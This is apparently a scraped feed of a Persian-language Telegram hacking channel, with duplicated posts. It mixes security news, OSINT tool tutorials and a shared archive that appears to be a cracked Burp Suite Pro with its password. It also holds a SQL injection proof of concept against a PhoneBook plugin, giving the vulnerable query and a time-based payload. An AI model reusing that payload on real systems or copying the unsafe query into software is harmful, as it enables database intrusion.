هنوز هم آسیپ پذیری PrintNightmare ادامه دارد .
در حالی که همه فکر می کنند مایکروسافت بعد از چند روز تاخیر با ارائه Patch ها مشکل را حل کرده است چند محقق امنیتی ثابت کردند Patch ها آسیب پذیری رو به صورت کامل بر طرف نمی کنند و همچنان Exploit آسیب پذیری وجود دارد .
بنابر این هنوز سرویس Print spooler را روی DC ها disable نگه دارید تا Patch مناسب توسط مایکروسافت ارائه بشه .
News
#PrintNightmare
——————
0Day.Today
@LearnExploit
@Tech_Army
در حالی که همه فکر می کنند مایکروسافت بعد از چند روز تاخیر با ارائه Patch ها مشکل را حل کرده است چند محقق امنیتی ثابت کردند Patch ها آسیب پذیری رو به صورت کامل بر طرف نمی کنند و همچنان Exploit آسیب پذیری وجود دارد .
بنابر این هنوز سرویس Print spooler را روی DC ها disable نگه دارید تا Patch مناسب توسط مایکروسافت ارائه بشه .
News
#PrintNightmare
——————
0Day.Today
@LearnExploit
@Tech_Army
معرفی ابزار Recon Ng در زمینه Osint در کالی لینوکس ( Part 1 )
Github
#kali #linux #tools #Osint
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#kali #linux #tools #Osint
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2021-22555: Turning \x00\x00 into 10000$
https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
——————
0Day.Today
@LearnExploit
@Tech_Army
https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
——————
0Day.Today
@LearnExploit
@Tech_Army
security-research
CVE-2021-22555: Turning \x00\x00 into 10000$
This project hosts security advisories and their accompanying proof-of-concepts related to research conducted at Google which impact non-Google owned code.
Critical WooCommerce SQL Injection Vulnerability
https://patchstack.com/woocommerce-sql-injection-vulnerability/
——————
0Day.Today
@LearnExploit
@Tech_Army
https://patchstack.com/woocommerce-sql-injection-vulnerability/
——————
0Day.Today
@LearnExploit
@Tech_Army
Patchstack
Critical WooCommerce SQL Injection Vulnerability Details - Patchstack
This security advisory is written about the WooCommerce SQL Injection vulnerability. Patchstack users are safe from the vulnerability.
اجرایی شدن طرح صیانت ( خیانت ) یه همچین چیزایی رو به همراه داره
اگر این طرح عملی بشه فضای مجازی میره که بره و ما هم باهاش میریم
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
اگر این طرح عملی بشه فضای مجازی میره که بره و ما هم باهاش میریم
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
دیتابیس کامل شماره تلفن کاربران کلاب هاوس لو رفت و برای فروش گذاشته شد.
نه تنها شماره کاربران کلاب هاوس بلکه شماره های کانتکت لیست سینک شده کاربران هم در دسترس قرار دارد .
raidforums
#Leak
——————
0Day.Today
@LearnExploit
@Tech_Army
نه تنها شماره کاربران کلاب هاوس بلکه شماره های کانتکت لیست سینک شده کاربران هم در دسترس قرار دارد .
raidforums
#Leak
——————
0Day.Today
@LearnExploit
@Tech_Army
ماهواره های استارلینک در آسمان های ایران .
کشور ایران رسما تحت پوشش اینترنت پرسرعت استارلینک قرار گرفت .
میتونین از این مپ هم عبورشون رو مشاهده کنین :
satellitemap.space
——————
0Day.Today
@LearnExploit
@Tech_Army
کشور ایران رسما تحت پوشش اینترنت پرسرعت استارلینک قرار گرفت .
میتونین از این مپ هم عبورشون رو مشاهده کنین :
satellitemap.space
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش ابزار Recon Ng در زمینه Osint در کالی لینوکس ( Part 2 )
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
برای لیست کردن تمام module ها میتونین از دستور show modules استفاده کنین
#kali #linux #tools #Osintiliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
burpsuite_pro_v2021.8.7z
381.4 MB
Burp Suite Version 2021.8,7
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *
pass: 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *
pass: 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
آسیب پذیری
#vulnerabilities:
in
#POC:
Username = ' or sleep(5)='-- -
Password = ' '
#V:
1.0
#VulnerablePage: http://localhost/PhoneBook/index.php
Sql injection
در پلاگین PhoneBook از WpCms :#vulnerabilities:
in
index.php
line 13 :$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
#POC:
Username = ' or sleep(5)='-- -
Password = ' '
#V:
1.0
#VulnerablePage: http://localhost/PhoneBook/index.php
Telegram
AttachLearnExploit
پروتون میل دیگر سرویس امنی برای هکرها نیست
برخلاف شعار no-log شرکت پروتون میل، این سرویس دهنده ایمیل قرار است از این به بعد IP و جزییات حساب هایی که از آنها شکایت شده و تحت پیگرد قرار میگیرند به مراجع قانونی تحویل دهد.
TheHackerNews
——————
0Day.Today
@LearnExploit
@Tech_Army
برخلاف شعار no-log شرکت پروتون میل، این سرویس دهنده ایمیل قرار است از این به بعد IP و جزییات حساب هایی که از آنها شکایت شده و تحت پیگرد قرار میگیرند به مراجع قانونی تحویل دهد.
TheHackerNews
——————
0Day.Today
@LearnExploit
@Tech_Army
Burpsuite Extensions one should have :
——————
0Day.Today
@LearnExploit
@Tech_Army
1 -
HTTP Request Smuggler2 -
HUNT3 -
InQL for Graphql Vulnerabilities4 -
J2EE Scan5 -
Json/JS Beautifier6 -
JSON web token Attacker7 -
xssValidator8 -
Ferida9 -
Hackvertor ——————
0Day.Today
@LearnExploit
@Tech_Army